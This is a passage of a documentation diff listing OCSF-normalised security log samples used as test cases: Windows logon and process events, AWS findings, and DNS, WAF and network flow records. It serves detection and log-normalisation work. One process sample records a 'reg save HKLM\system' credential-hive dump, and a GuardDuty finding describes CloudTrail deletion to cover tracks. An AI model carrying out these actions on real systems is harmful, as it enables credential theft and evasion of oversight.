"pid": -1 + }, + "logon_type": "OS Service", + "logon_type_id": 5, + "message": "An account was successfully logged on.", + "metadata": { + "original_time": "03/12/2021 10:48:14 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "ce139867-ced1-4742-9bb0-ad1926b8bbe1", + "version": "1.0.0-rc.2" + }, + "session": { + "uid": "0x3E7", + "uuid": "{00000000-0000-0000-0000-000000000000}" + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "-", + "name": "-", + "port": 0 + }, + "status": "Success", + "status_id": 1, + "time": 1615564094000, + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "Detailed Authentication Information": { + "Key Length": "0", + "Package Name 
(NTLM only)": "-", + "Transited Services": "-" + }, + "EventCode": "4624", + "EventType": "0", + "Impersonation Level": "Impersonation", + "Logon Information": { + "Elevated Token": "Yes", + "Restricted Admin Mode": "-", + "Virtual Account": "No" + }, + "New Logon": { + "Linked Logon ID": "0x0", + "Network Account Domain": "-", + "Network Account Name": "-" + }, + "OpCode": "Info", + "RecordNumber": "257879", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Logon" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "NT AUTHORITY", + "name": "SYSTEM", + "uid": "NT AUTHORITY\\SYSTEM" + } + } + ``` + + + +=== "test_authentication_3" + + + ```json + { + "activity_id": 1, + "activity_name": "Logon", + "actor": { + "process": { + "file": { + "name": "-", + "path": "-", + "type": "Regular File", + "type_id": 1 + }, + "pid": 0 + }, + "session": { + "uid": "0x0" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "-", + "name": "-", + "uid": "NULL SID" + } + }, + "auth_protocol": "NTLM", + "auth_protocol_id": 1, + "category_name": "Audit Activity", + "category_uid": 3, + "class_name": "Authentication", + "class_uid": 3002, + "device": { + "hostname": "EC2AMAZ-6KJ2BPP", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "dst_endpoint": { + "hostname": "EC2AMAZ-6KJ2BPP" + }, + "logon_process": { + "name": "NtLmSsp ", + "pid": -1 + }, + "logon_type": "Network", + "logon_type_id": 3, + "message": "An account failed to log on.", + "metadata": { + "original_time": "10/08/2020 12:41:47 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "a738d6e6-4ebd-49bb-805e-45d0604a1bef", + "version": "1.0.0-rc.2" + }, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "-", + "name": 
"EC2AMAZ-6KJ2BPP", + "port": 0 + }, + "status": "0xC000006D", + "status_detail": "Unknown user name or bad password.", + "status_id": 2, + "time": 1602175307000, + "type_name": "Authentication: Logon", + "type_uid": 300201, + "unmapped": { + "Detailed Authentication Information": { + "Key Length": "0", + "Package Name (NTLM only)": "-", + "Transited Services": "-" + }, + "EventCode": "4625", + "EventType": "0", + "Failure Information": { + "Sub Status": "0xC000006A" + }, + "OpCode": "Info", + "RecordNumber": "223742", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Logon" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "EC2AMAZ-6KJ2BPP", + "name": "Administrator", + "uid": "NULL SID" + } + } + ``` + + + +=== "test_compliance_finding_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Update", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Compliance Finding", + "class_uid": 2003, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "compliance": { + "control": "Config.1", + "requirements": [ + "PCI DSS 10.5.2", + "PCI DSS 11.5" + ], + "standards": [ + "standards/pci-dss/v/3.2.1" + ], + "status": "FAILED" + }, + "finding_info": { + "created_time_dt": "2023-01-13T15:08:44.967-05:00", + "desc": "This AWS control checks whether AWS Config is enabled in current account and region.", + "first_seen_time_dt": "2023-01-13T15:08:44.967-05:00", + "last_seen_time_dt": "2023-07-21T14:12:05.693-04:00", + "modified_time_dt": "2023-07-21T14:11:53.060-04:00", + "title": "PCI.Config.1 AWS Config should be enabled", + "types": [ + "Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS" + ], + "uid": "arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6" + }, + "metadata": { + "log_version": "2018-10-08", + "processed_time_dt": 
"2023-07-21T14:12:08.489-04:00", + "product": { + "feature": { + "uid": "pci-dss/v/3.2.1/PCI.Config.1" + }, + "name": "Security Hub", + "uid": "arn:aws:securityhub:us-east-2::product/aws/securityhub", + "vendor_name": "AWS" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "resource.uid", + "type": "Resource UID", + "type_id": 10, + "value": "AWS::::Account:111111111111" + } + ], + "remediation": { + "desc": "For information on how to correct this issue, consult the AWS Security Hub controls documentation.", + "references": [ + "https://docs.aws.amazon.com/console/securityhub/Config.1/remediation" + ] + }, + "resource": { + "cloud_partition": "aws", + "region": "us-east-2", + "type": "AwsAccount", + "uid": "AWS::::Account:111111111111" + }, + "severity": "Medium", + "severity_id": 3, + "status": "New", + "time": 1689963113060, + "time_dt": "2023-07-21T14:11:53.060-04:00", + "type_name": "Compliance Finding: Update", + "type_uid": 200302, + "unmapped": { + "FindingProviderFields.Severity.Label": "MEDIUM", + "FindingProviderFields.Severity.Original": "MEDIUM", + "FindingProviderFields.Types[]": "Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS", + "ProductFields.ControlId": "PCI.Config.1", + "ProductFields.RecommendationUrl": "https://docs.aws.amazon.com/console/securityhub/Config.1/remediation", + "ProductFields.Resources:0/Id": "arn:aws:iam::111111111111:root", + "ProductFields.StandardsArn": "arn:aws:securityhub:::standards/pci-dss/v/3.2.1", + "ProductFields.StandardsControlArn": "arn:aws:securityhub:us-east-2:111111111111:control/pci-dss/v/3.2.1/PCI.Config.1", + "ProductFields.StandardsSubscriptionArn": "arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1", + "ProductFields.aws/securityhub/CompanyName": "AWS", + "ProductFields.aws/securityhub/FindingId": 
"arn:aws:securityhub:us-east-2::product/aws/securityhub/arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6", + "ProductFields.aws/securityhub/ProductName": "Security Hub", + "RecordState": "ACTIVE", + "Severity.Normalized": "40", + "Severity.Original": "MEDIUM", + "Severity.Product": "40", + "WorkflowState": "NEW" + } + } + ``` + + + +=== "test_detection_finding_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Create", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "evidences": [ + { + "api": { + "operation": "DeleteTrail", + "service": { + "name": "cloudtrail.amazonaws.com" + } + }, + "data": "", + "src_endpoint": { + "ip": "52.94.133.131", + "location": { + "city": "", + "coordinates": [ + -100.821999, + 37.751 + ], + "country": "United States" + } + } + } + ], + "finding_info": { + "created_time_dt": "2023-09-19T11:05:22.487-04:00", + "desc": "AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled by Admin calling DeleteTrail under unusual circumstances. 
This can be attackers attempt to cover their tracks by eliminating any trace of activity performed while they accessed your account.", + "first_seen_time_dt": "2023-09-19T10:55:09.000-04:00", + "last_seen_time_dt": "2023-09-19T10:55:09.000-04:00", + "modified_time_dt": "2023-09-19T11:05:22.487-04:00", + "src_url": "https://us-east-2.console.aws.amazon.com/guardduty/home?region=us-east-2#/findings?macros=current&fId=a6c556fcbc9bea427a19f8b787099a0b", + "title": "AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled.", + "types": [ + "TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled" + ], + "uid": "arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b" + }, + "metadata": { + "extensions": [ + { + "name": "linux", + "uid": "1", + "version": "1.1.0" + } + ], + "log_version": "2018-10-08", + "product": { + "feature": { + "uid": "arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE" + }, + "name": "GuardDuty", + "uid": "arn:aws:securityhub:us-east-2::product/aws/guardduty", + "vendor_name": "Amazon" + }, + "profiles": [ + "cloud", + "datetime", + "linux" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "evidences[].src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "52.94.133.131" + }, + { + "name": "resources[].uid", + "type": "Resource UID", + "type_id": 10, + "value": "AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE" + } + ], + "resources": [ + { + "cloud_partition": "aws", + "data": "{\"AwsIamAccessKey\":{\"PrincipalId\":\"AROATMJPC7YEXAMPLE:example\",\"PrincipalName\":\"Admin\",\"PrincipalType\":\"AssumedRole\"}}", + "region": "us-east-2", + "type": "AwsIamAccessKey", + "uid": "AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE" + } + ], + "severity": "Low", + "severity_id": 2, + "status": "New", + "time": 1695135922487, + "time_dt": "2023-09-19T11:05:22.487-04:00", + "type_name": "Detection Finding: Create", 
+ "type_uid": 200401, + "unmapped": { + "FindingProviderFields.Severity.Label": "LOW", + "FindingProviderFields.Types[]": "TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled", + "ProductFields.aws/guardduty/service/action/actionType": "AWS_API_CALL", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::CloudTrail::Trail": "arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType": "Remote IP", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn": "16509", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg": "AMAZON-02", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp": "Amazon Office", + "ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org": "Amazon Office", + "ProductFields.aws/guardduty/service/additionalInfo/type": "default", + "ProductFields.aws/guardduty/service/archived": "false", + "ProductFields.aws/guardduty/service/count": "1", + "ProductFields.aws/guardduty/service/detectorId": "1ac1bfceda6679698215d5d0EXAMPLE", + "ProductFields.aws/guardduty/service/eventFirstSeen": "2023-09-19T14:55:09.000Z", + "ProductFields.aws/guardduty/service/eventLastSeen": "2023-09-19T14:55:09.000Z", + "ProductFields.aws/guardduty/service/resourceRole": "TARGET", + "ProductFields.aws/guardduty/service/serviceName": "guardduty", + "ProductFields.aws/securityhub/CompanyName": "Amazon", + "ProductFields.aws/securityhub/FindingId": "arn:aws:securityhub:us-east-2::product/aws/guardduty/arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b", + "ProductFields.aws/securityhub/ProductName": "GuardDuty", + "RecordState": "ACTIVE", + "Sample": "false", + "Severity.Normalized": "40", + "Severity.Product": "2", + 
"WorkflowState": "NEW" + } + } + ``` + + + +=== "test_dns_activity_1" + + + ```json + { + "action": "Allowed", + "action_id": 1, + "activity_id": 6, + "activity_name": "Traffic", + "answers": [ + { + "class": "IN", + "rdata": "127.0.0.62", + "type": "A" + } + ], + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "DNS Activity", + "class_uid": 4003, + "cloud": { + "account": { + "uid": "123456789012" + }, + "provider": "AWS", + "region": "us-east-1" + }, + "connection_info": { + "direction": "Unknown", + "direction_id": 0, + "protocol_name": "UDP" + }, + "disposition": "Alert", + "dst_endpoint": { + "instance_uid": "rslvr-in-0000000000000000", + "interface_uid": "rni-0000000000000000" + }, + "firewall_rule": { + "uid": "rslvr-frg-000000000000000" + }, + "metadata": { + "product": { + "feature": { + "name": "Resolver Query Logs" + }, + "name": "Route 53", + "vendor_name": "AWS", + "version": "1.100000" + }, + "profiles": [ + "cloud", + "security_control", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "answers[].rdata", + "type": "IP Address", + "type_id": 2, + "value": "127.0.0.62" + }, + { + "name": "dst_endpoint.instance_uid", + "type": "Resource UID", + "type_id": 10, + "value": "rslvr-in-0000000000000000" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "10.200.21.100" + }, + { + "name": "query.hostname", + "type": "Hostname", + "type_id": 1, + "value": "ip-127-0-0-62.alert.firewall.canary." 
+ } + ], + "query": { + "class": "IN", + "hostname": "ip-127-0-0-62.alert.firewall.canary.", + "type": "A" + }, + "rcode": "NoError", + "rcode_id": 0, + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "10.200.21.100", + "port": 15083, + "vpc_uid": "vpc-00000000000000000" + }, + "time": 1665694956000, + "time_dt": "2022-10-13T17:02:36.000-04:00", + "type_name": "DNS Activity: Traffic", + "type_uid": 400306, + "unmapped": { + "firewall_domain_list_id": "rslvr-fdl-0000000000000" + } + } + ``` + + + +=== "test_http_activity_1" + + + ```json + { + "activity_id": 3, + "activity_name": "Get", + "category_name": "Network Activitys", + "category_uid": 4, + "class_name": "HTTP Activity", + "class_uid": 4002, + "cloud": { + "provider": "AWS" + }, + "dst_endpoint": { + "domain": "/CanaryTest" + }, + "firewall_rule": { + "type": "RATE_BASED", + "uid": "RateBasedRule" + }, + "http_request": { + "args": "", + "http_method": "GET", + "uid": "Ed0AiHF_CGYF-DA=", + "url": { + "path": "/CanaryTest" + }, + "version": "HTTP/1.1" + }, + "http_response": { + "code": 403 + }, + "metadata": { + "labels": null, + "product": { + "feature": { + "uid": "..." + }, + "name": "AWS WAF", + "vendor_name": "AWS", + "version": "1" + }, + "version": "1.1.0-dev" + }, + "severity_id": 1, + "src_endpoint": { + "ip": "52.46.82.45", + "location": { + "country": "FR" + }, + "svc_name": "APIGW", + "uid": "EXAMPLE11:rjvegx5guh:CanaryTest" + }, + "time": 0, + "type_name": "HTTP Activity: Get", + "type_uid": 400203, + "unmapped": [ + [ + "rateBasedRuleList[].rateBasedRuleId", + "..." 
+ ], + [ + "rateBasedRuleList[].customValues[].value", + "ella" + ], + [ + "rateBasedRuleList[].customValues[].name", + "dogname" + ], + [ + "rateBasedRuleList[].limitKey", + "CUSTOMKEYS" + ], + [ + "rateBasedRuleList[].customValues[].key", + "HEADER" + ], + [ + "httpRequest.headers[].value", + "52.46.82.45,https,443,rjvegx5guh.execute-api.eu-west-3.amazonaws.com,Root=1-645566cf-7cb058b04d9bb3ee01dc4036,ella,RateBasedRuleTestKoipOneKeyModulePV2,gzip,deflate" + ], + [ + "rateBasedRuleList[].rateBasedRuleName", + "RateBasedRule" + ], + [ + "rateBasedRuleList[].maxRateAllowed", + "100" + ], + [ + "httpRequest.headers[].name", + "X-Forwarded-For,X-Forwarded-Proto,X-Forwarded-Port,Host,X-Amzn-Trace-Id,dogname,User-Agent,Accept-Encoding" + ] + ] + } + ``` + + + +=== "test_network_activity_1" + + + ```json + { + "cloud": { + "account_uid": "987654321098", + "region": "us-west-2", + "zone": "use2-az2", + "provider": "AWS" + }, + "action": "Allowed", + "action_id": 1, + "status_code": "OK", + "traffic": { + "bytes": 85, + "packets": 10 + }, + "src_endpoint": { + "ip": "192.168.1.10", + "port": 8080, + "svc_name": "amazon-s3", + "subnet_uid": "subnet-33333333333333333", + "vpc_uid": "vpc-44444444444444444" + }, + "dst_endpoint": { + "ip": "192.168.1.20", + "port": 443, + "svc_name": "amazon-ec2", + "interface_uid": "eni-22222222222222222", + "instance_uid": "i-111111111111111111" + }, + "connection_info": { + "protocol_num": 17, + "protocol_ver": "IPv6", + "tcp_flags": 6, + "direction": "egress", + "direction_id": 2, + "boundary_id": 99, + "boundary": "vpn", + "start_time": 1653200123, + "end_time": 1653200100 + }, + "time": 1653200100, + "type_name": "Network Activity: Traffic", + "type_uid": 400105, + "activity_id": 5, + "activity_name": "Traffic", + "class_uid": 4001, + "class_name": "Network Activity", + "category_uid": 4, + "category_name": "Network Activity", + "metadata": { + "product": { + "name": "Amazon VPC", + "feature": { + "name": "Flowlogs" + }, + 
"vendor_name": "AWS" + }, + "profiles": [ + "cloud", + "security_control" + ], + "version": "1.1.0" + }, + "severity_id": 1, + "severity": "Informational", + "status_id": 1, + "status": "Success", + "disposition": "Allowed", + "pkt_src_aws_service": "amazon-s3", + "pkt_dst_aws_service": "amazon-ec2", + "sublocation_type": "subnet", + "sublocation_id": "subnet-33333333333333333" + } + ``` + + + +=== "test_network_activity_2" + + + ```json + { + "action": "Denied", + "action_id": 2, + "activity_id": 5, + "activity_name": "Refuse", + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "Network Activity", + "class_uid": 4001, + "cloud": { + "account": { + "uid": "123456789012" + }, + "provider": "AWS", + "region": "us-east-1", + "zone": "use1-az1" + }, + "connection_info": { + "boundary": "-", + "boundary_id": 99, + "direction": "Inbound", + "direction_id": 1, + "protocol_num": 6, + "protocol_ver": "IPv4", + "tcp_flags": 2 + }, + "disposition": "Blocked", + "dst_endpoint": { + "instance_uid": "i-000000000000000000", + "interface_uid": "eni-000000000000000000", + "ip": "172.31.2.52", + "port": 39938, + "subnet_uid": "subnet-000000000000000000", + "svc_name": "-", + "vpc_uid": "vpc-00000000" + }, + "end_time_dt": "2022-04-11T20:03:08.000-04:00", + "metadata": { + "product": { + "feature": { + "name": "Flowlogs" + }, + "name": "Amazon VPC", + "vendor_name": "AWS", + "version": "5" + }, + "profiles": [ + "cloud", + "security_control", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "dst_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "172.31.2.52" + }, + { + "name": "dst_endpoint.instance_uid", + "type": "Resource UID", + "type_id": 10, + "value": "i-000000000000000000" + }, + { + "name": "src_endpoint.ip", + "type": "IP Address", + "type_id": 2, + "value": "1.2.3.4" + } + ], + "severity": "Informational", + "severity_id": 1, + "src_endpoint": { + "ip": "1.2.3.4", + "port": 56858, + "svc_name": "-" + }, + 
"start_time_dt": "2022-04-11T20:02:12.000-04:00", + "status_code": "OK", + "time": 1649721732000, + "time_dt": "2022-04-11T20:02:12.000-04:00", + "traffic": { + "bytes": 40, + "packets": 1 + }, + "type_name": "Network Activity: Refuse", + "type_uid": 400105, + "unmapped": { + "sublocation_id": "-", + "sublocation_type": "-" + } + } + ``` + + + +=== "test_network_activity_3" + + + ```json + { + "activity_name": "Traffic", + "activity_id": 6, + "category_name": "Network Activity", + "category_uid": 4, + "class_name": "Network Activity", + "class_uid": 4001, + "type_uid": 400106, + "type_name": "Network Activity: Traffic", + "severity_id": 1, + "severity": "Informational", + "start_time": "2015/06/17T00:00:00.083", + "end_time": "2015/06/17T00:00:00.089", + "duration": 0.006, + "metadata": { + "product": { + "version": "3.9.0", + "name": "SiLK", + "feature": { + "name": " Network Flow Data" + }, + "vendor_name": "CERT/NetSA at Carnegie Mellon University - Software Engineering Institute" + }, + "version": "1.0.0-rc.3" + }, + "src_endpoint": { + "port": 63975, + "ip": "192.168.40.20" + }, + "dst_endpoint": { + "port": 443, + "ip": "10.0.40.21" + }, + "connection_info": { + "protocol_num": 6, + "tcp_flags": 19, + "boundary_id": 99, + "boundary": "Other", + "direction_id": 2, + "direction": "Outbound" + }, + "traffic": { + "packets": 8, + "bytes": 344 + }, + "unmapped": { + "sensor": "S1", + "in": 0, + "out": 0, + "nhIP": "0.0.0.0", + "initialFlags": "", + "sessionFlags": "", + "attributes": "", + "application": 0, + "class": "all", + "type": "outweb", + "iType": "", + "iCode": "" + } + } + ``` + + + +=== "test_network_activity_4" + + + ```json + { + "time": 1591367999.305988, + "uuid": "CMdzit1AMNsmfAIiQc", + "src_endpoint": { + "ip": "192.168.4.76", + "port": 36844 + }, + "dst_endpoint": { + "ip": "192.168.4.1", + "port": 53 + }, + "connection_info": { + "protocol_name": "udp" + }, + "bytes_in": 62, + "packets_in": 2, + "orig_bytes": { + "ip": 118 + }, + "bytes_out": 
141, + "packets_out": 2, + "resp_bytes": { + "ip": 197 + }, + "duration": 0.06685185432434082, + "unmapped": { + "conn_state": "SF" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "conn.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1, + "proposed_new_attributes": { + "application_protocol": "dns", + "bytes_missed": 0, + "connection_history": "Dd" + } + } + ``` + + + +=== "test_network_activity_5" + + + ```json + { + "time": 1591367999.305988, + "uuid": "CMdzit1AMNsmfAIiQc", + "src_endpoint": { + "ip": "192.168.4.76", + "port": 36844 + }, + "dst_endpoint": { + "ip": "192.168.4.1", + "port": 53 + }, + "connection_info": { + "protocol_name": "udp" + }, + "bytes_in": 62, + "packets_in": 2, + "orig_bytes": { + "ip": 118 + }, + "bytes_out": 141, + "packets_out": 2, + "resp_bytes": { + "ip": 197 + }, + "duration": 0.06685185432434082, + "unmapped": { + "conn_state": "SF" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "conn.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1, + "proposed_new_attributes": { + "application_protocol": "dns", + "bytes_missed": 0, + "connection_history": "Dd" + } + } + ``` + + + +=== "test_network_activity_6" + + + ```json + { + "time": 1598377391.921726, + "uuid": "CsukF91Bx9mrqdEaH9", + "src_endpoint": { + "ip": "192.168.4.49", + "port": 56718 + }, + "dst_endpoint": { + "ip": "13.32.202.10", + "port": 443 + }, + "version": "TLSv12", + "cipher": "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", + "certificate": "secp256r1", + "domain": "www.taosecurity.com", + "certificate_chain": [ + 
"F2XEvj1CahhdhtfvT4", + "FZ7ygD3ERPfEVVohG9", + "F7vklpOKI4yX9wmvh", + "FAnbnR32nIIr2j9XV" + ], + "subject": "CN=www.taosecurity.com", + "issuer": "CN=Amazon,OU=Server CA 1B,O=Amazon,C=US", + "unmapped": { + "next_protocol": "h2", + "resumed": false + }, + "network_activity": { + "status_id": "1" + }, + "category_uid": 4, + "category_name": "Network Activity", + "class_uid": 4001, + "class_name": "Network Activity", + "metadata": { + "profiles": [ + "security_control" + ], + "product": { + "name": "Zeek", + "feature": { + "name": "ssl.log" + }, + "vendor_name": "Zeek" + } + }, + "severity": "Informational", + "severity_id": 1 + } + ``` + + + +=== "test_process_activity_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Launch", + "actor": { + "process": { + "file": { + "name": "cmd.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\cmd.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 3948 + }, + "session": { + "uid": "0x55E621" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "ATTACKRANGE", + "name": "Administrator", + "uid": "ATTACKRANGE\\Administrator" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Process Activity", + "class_uid": 1007, + "device": { + "hostname": "win-dc-725.attackrange.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "message": "A new process has been created.", + "metadata": { + "original_time": "03/12/2021 10:48:14 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "a47bd2fb-4da1-4378-8961-81f81f90aec2", + "version": "1.0.0-rc.2" + }, + "process": { + "cmd_line": "reg save HKLM\\system C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\system ", + "file": { + "name": "reg.exe", + "parent_folder": "C:\\Windows\\System32", + "path": 
"C:\\Windows\\System32\\reg.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 4696, + "session": { + "uid": "0x0" + }, + "user": { + "domain": "-", + "name": "-", + "uid": "NULL SID" + } + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1615564094000, + "type_name": "Process Activity: Launch", + "type_uid": 100701, + "unmapped": { + "EventCode": "4688", + "EventType": "0", + "OpCode": "Info", + "Process Information": { + "Mandatory Label": "Mandatory Label\\High Mandatory Level", + "Token Elevation Type": "%%1936" + }, + "RecordNumber": "257874", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Process Creation" + } + } + ``` + + + +=== "test_process_activity_2" + + + ```json + { + "activity_id": 2, + "activity_name": "Terminate", + "actor": { + "process": { + "file": { + "name": "auditon.exe", + "parent_folder": "C:\\Generate_Security_Events1", + "path": "C:\\Generate_Security_Events1\\auditon.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 1524 + }, + "session": { + "uid": "0x1806d9" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "LOGISTICS", + "name": "Administrator", + "uid": "S-1-5-21-1135140816-2109348461-2107143693-500" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Process Activity", + "class_uid": 1007, + "device": { + "hostname": "dcc1.Logistics.local", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "exit_code": 0, + "message": "A process has exited.", + "metadata": { + "original_time": "09/05/2019 11:22:49 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "cc27b41c-94e0-48a9-8cc2-5a1598fb8d1f", + "version": "1.0.0-rc.2" + }, + "process": { + "file": { + "name": "auditon.exe", + 
"parent_folder": "C:\\Generate_Security_Events1", + "path": "C:\\Generate_Security_Events1\\auditon.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 1524 + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1567696969000, + "type_name": "Process Activity: Terminate", + "type_uid": 100702, + "unmapped": { + "EventCode": "4689", + "EventType": "0", + "OpCode": "Info", + "RecordNumber": "6828379", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Process Termination" + } + } + ``` + + + +=== "test_security_finding_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "classname": "Security Finding", + "class_uid": 2001, + "finding": { + "created_time": 1672758699558, + "desc": "Linux Kernel Module injection using insmod detected (user=%user.name user_loginuid=%user.loginuid parent_process=%proc.pname module=%proc.args %container.info image=%container.image.repository:%container.image.tag)", + "title": "Linux Kernel Module Injection Detected", + "types": [ + "syscalls" + ], + "uid": "ec834826-90c1-458a-8eec-a014e7266754" + }, + "message": "Linux Kernel Module Injection Detected", + "metadata": { + "version": "0.1.0", + "product": { + "vendor_name": "Falcosecurity", + "name": "Falco" + }, + "labels": [ + "process" + ] + }, + "observables": [ + { + "name": "hostname", + "type": "Other", + "type_id": 0, + "value": "host0.local" + }, + { + "name": "proc.pname", + "type": "Other", + "type_id": 0, + "value": "proc.pname" + }, + { + "name": "container.info", + "type": "Other", + "type_id": 0, + "value": "container.info" + }, + { + "name": "proc.args", + "type": "Other", + "type_id": 0, + "value": "proc.args" + }, + { + "name": "user.loginuid", + "type": "Other", + "type_id": 0, + "value": "user.loginuid" + }, + { + "name": "user.name", + "type": "Other", + "type_id": 0, + "value": "user.name" + }, + { + "name": 
"container.image.repository", + "type": "Other", + "type_id": 0, + "value": "container.image.repository" + }, + { + "name": "container.image.tag", + "type": "Other", + "type_id": 0, + "value": "container.image.tag" + } + ], + "raw_data": "{\"uuid\":\"ec834826-90c1-458a-8eec-a014e7266754\",\"output\":\"Linux Kernel Module injection using insmod detected (user=%user.name user_loginuid=%user.loginuid parent_process=%proc.pname module=%proc.args %container.info image=%container.image.repository:%container.image.tag)\",\"priority\":\"Warning\",\"rule\":\"Linux Kernel Module Injection Detected\",\"time\":\"2023-01-03T15:11:39.558068644Z\",\"output_fields\":{\"akey\":\"AValue\",\"bkey\":\"BValue\",\"ckey\":\"CValue\",\"container.image.repository\":\"container.image.repository\",\"container.image.tag\":\"container.image.tag\",\"container.info\":\"container.info\",\"dkey\":\"bar\",\"proc.args\":\"proc.args\",\"proc.pname\":\"proc.pname\",\"user.loginuid\":\"user.loginuid\",\"user.name\":\"user.name\"},\"source\":\"syscalls\",\"tags\":[\"process\"],\"hostname\":\"host0.local\"}", + "severity": "Medium", + "severity_id": 3, + "state": "New", + "state_id": 1, + "status": "Warning", + "time": 1672758699558, + "type_name": "Security Finding: Generate", + "type_uid": 200101 + } + ``` + + + +=== "test_security_finding_2" + + + ```json + { + "analytic": { + "desc": "Custom Rule Engine", + "name": "CRE", + "relatedAnalytics": [ + { + "category": "CRE_RULE", + "name": "Network DoS Attack Detected", + "type": "Rule", + "typeId": 1, + "uid": "100079" + } + ], + "type": "Rule", + "typeId": 1 + }, + "finding": { + "uid": "591", + "title": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt\n", + "created_time": 1682347463218, + "desc": "BLEEDING-EDGE DOS 